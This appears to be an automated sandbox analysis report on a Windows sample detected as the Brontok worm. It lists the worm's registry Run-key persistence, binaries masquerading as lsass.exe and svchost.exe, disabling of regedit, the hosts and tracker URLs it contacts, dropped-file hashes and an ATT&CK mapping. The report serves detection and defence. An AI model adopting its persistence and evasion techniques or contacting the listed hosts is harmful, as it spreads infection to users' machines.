                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Icon mismatch, binary includes an icon from a different legit application in order to fool users
                  Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2636).png
                  Changes the view of files in windows explorer (hidden files and folders)
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\smss.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\services.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inetinfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\winlogon.exeWindow / User API: foregroundWindowGot 425
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile opened: C:\Users\user\AppData

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 172.67.70.191 443
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 3.94.10.34 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 72.14.178.174 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 3.130.204.160 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 103.6.117.2 80
                  Source: C:\Users\user\AppData\Local\svchost.exeNetwork Connect: 103.6.117.3 443
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\lsass.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Disables the Windows registry editor (regedit)
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryTools

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		1
                  Replication Through Removable Media                  		1
                  Scheduled Task/Job                  		1
                  Windows Service                  		1
                  Windows Service                  		221
                  Masquerading                  		OS Credential Dumping1
                  Application Window Discovery                  		Remote ServicesData from Local System2
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Scheduled Task/Job                  		11
                  Process Injection                  		1
                  Disable or Modify Tools                  		LSASS Memory11
                  Peripheral Device Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Scripting                  		1
                  Scheduled Task/Job                  		11
                  Process Injection                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron411
                  Registry Run Keys / Startup Folder                  		411
                  Registry Run Keys / Startup Folder                  		1
                  Hidden Files and Directories                  		NTDS12
                  System Information Discovery                  		Distributed Component Object ModelInput Capture13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  File Deletion                  		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Pedang @ P#U00ecsau.exe100%ReversingLabsWin32.Worm.Brontok
                  Pedang @ P#U00ecsau.exe96%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif100%AviraTR/Brontok.Q
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif100%AviraTR/Brontok.Q
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif100%AviraTR/Brontok.Q
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif100%AviraTR/Brontok.Q
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif100%AviraTR/Brontok.Q
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.debuging.com/WS1/cgi/x.cgi?NAVG=Tracker&username=%64%65%6C%62%65%6C%62%72%6F0%Avira URL Cloudsafe
                  http://www.17tahun.com/?0%Avira URL Cloudsafe
                  http://www.20mbweb.com/Kids/dbrotlu/Host18.css0%Avira URL Cloudsafe
                  http://www.20mbweb.com/Kids/dbrotlu/Bron-IDUTSPLD.css0%Avira URL Cloudsafe
                  http://www.kaskus.com/?0%Avira URL Cloudsafe
                  http://www.fajarweb.com/?100%Avira URL Cloudmalware
                  http://www.20mbweb.com/Kids/dbrotlu/IN18.css0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  google.com
                  		172.217.18.14
                  		truefalse
                    		high
                    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
                    		3.130.204.160
                    		truetrue
                      		unknown
                      www.20mbweb.com
                      		104.21.48.1
                      		truefalse
                        		unknown
                        www.debuging.com
                        		72.14.178.174
                        		truetrue
                          		unknown
                          www.kaskus.co.id
                          		103.6.117.3
                          		truetrue
                            		unknown
                            www.fajarweb.com
                            		3.94.10.34
                            		truetrue
                              		unknown
                              kaskus.com
                              		103.6.117.2
                              		truetrue
                                		unknown
                                www.hugedomains.com
                                		172.67.70.191
                                		truetrue
                                  		unknown
                                  www.kaskus.com
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.17tahun.com
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.kaskus.com/?true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.20mbweb.com/Kids/dbrotlu/IN18.cssfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fajarweb.com/?true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.20mbweb.com/Kids/dbrotlu/Bron-IDUTSPLD.cssfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.debuging.com/WS1/cgi/x.cgi?NAVG=Tracker&username=%64%65%6C%62%65%6C%62%72%6Ftrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.17tahun.com/?true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.20mbweb.com/Kids/dbrotlu/Host18.cssfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      172.67.70.191
                                      		www.hugedomains.comUnited States
                                      		13335CLOUDFLARENETUStrue
                                      104.21.48.1
                                      		www.20mbweb.comUnited States
                                      		13335CLOUDFLARENETUSfalse
                                      3.130.204.160
                                      		hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comUnited States
                                      		16509AMAZON-02UStrue
                                      3.94.10.34
                                      		www.fajarweb.comUnited States
                                      		14618AMAZON-AESUStrue
                                      103.6.117.2
                                      		kaskus.comIndonesia
                                      		132164KASKUSNETWORKS-ASPTDartaMediaIndonesiaIDtrue
                                      103.6.117.3
                                      		www.kaskus.co.idIndonesia
                                      		132164KASKUSNETWORKS-ASPTDartaMediaIndonesiaIDtrue
                                      72.14.178.174
                                      		www.debuging.comUnited States
                                      		63949LINODE-APLinodeLLCUStrue

                                      General Information

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1592395
                                      Start date and time:2025-01-16 04:06:31 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:26
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • EGA enabled
                                      Analysis Mode:stream
                                      Analysis stop reason:Timeout
                                      Sample name:Pedang @ P#U00ecsau.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:Pedang @ Psau.exe
                                      Detection:MAL
                                      Classification:mal100.spre.evad.winEXE@29/18@9/24
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetValueKey calls found.
                                      • VT rate limit hit for: hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
                                      • VT rate limit hit for: www.debuging.com

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Bron.tok.A18.em.bin

                                      Download File
                                      Process:C:\Users\user\AppData\Local\lsass.exe
                                      File Type:HTML document, ASCII text, with very long lines (7836), with no line terminators
                                      Category:dropped
                                      Size (bytes):7836
                                      Entropy (8bit):6.1583163930957925
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:0E7B4235D81334870F69EF97FB1A2B65
                                      SHA1:C12FEFF9A185F7D2581FF842357D4F91D4A69B89
                                      SHA-256:254626E9950B281244D4488BB88609405259160F90E4DF111A0992E39C3F685A
                                      SHA-512:A9C303274C972BFDFB55B1D5B571A1AC67BEC81C728835D84C8D838C6E1DEBB2E46AC5FA51C9F5E83B4E0CCC8483CE011A8A30C843DA2DF298498980A437CC7B
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i

                                      C:\Users\user\AppData\Local\BronMessmss.ini

                                      Download File
                                      Process:C:\Users\user\AppData\Local\smss.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):10
                                      Entropy (8bit):2.721928094887362
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:07A59466AF15A4BF724770F0EE924A57
                                      SHA1:A55F936CE3447D28931BF85C83E2029DC2CF8CFD
                                      SHA-256:B8D6C940EA31312FD618DDD9BEFA89555F5501B025EBBD7858CE0A83814879A9
                                      SHA-512:9901DFAA646898FA7CFDF84FBC1DDA47511EDA5F827BCE76E31E6F1AA601F7ED0D70FDBB9023FA558218D7C64699EAE90397D8B43C117232D491FD06C44DD079
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:01152207..

                                      C:\Users\user\AppData\Local\BronNPath0.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\lsass.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:81051BCC2CF1BEDF378224B0A93E2877
                                      SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                      SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                      SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:..

                                      C:\Users\user\AppData\Local\BronNetDomList.bat

                                      Download File
                                      Process:C:\Users\user\AppData\Local\lsass.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):62
                                      Entropy (8bit):4.845663149851382
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5B19C6C580B9595DCD141EA6FD2B22E6
                                      SHA1:8DE8E97652FE90AA7959C2BE83CA539F419C5020
                                      SHA-256:78B454B11F1219F24729304C293383B0C3E1D84E7808F21C1AA4EBEA249C34B3
                                      SHA-512:1E7A0EECCA2BB5DAF80C87A286705E35D0F488D62123AB28DB76CC45B6AE3E6623EA42549EC4E8ED95B00DD41D8BF645024C09C20B37C226B3BDD97F1D3E0606
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:EXIT >> "C:\Users\user\AppData\Local\BronFoldNetDomList.txt"..

                                      C:\Users\user\AppData\Local\JunkAtx18.bin

                                      Download File
                                      Process:C:\Users\user\AppData\Local\svchost.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):15
                                      Entropy (8bit):3.7735572622751845
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:A763F01F928FF565B320AC0EB2158995
                                      SHA1:5371623DA9EB2D46886C3D4A33059D76749B79DC
                                      SHA-256:97B1D0E9352FF0E85EEFF7A3EC6E98B61CF8071418892C9E2967F43257A19BA9
                                      SHA-512:CC07BE9EFCBDF4327F5DC829E534EF0B3F6B666515F956B5C54FE66D449B4EDAA481858F767372C2046F825F67109CB6352FF2BA3E0A745CC9AD66DA154BA5DB
                                      Malicious:false
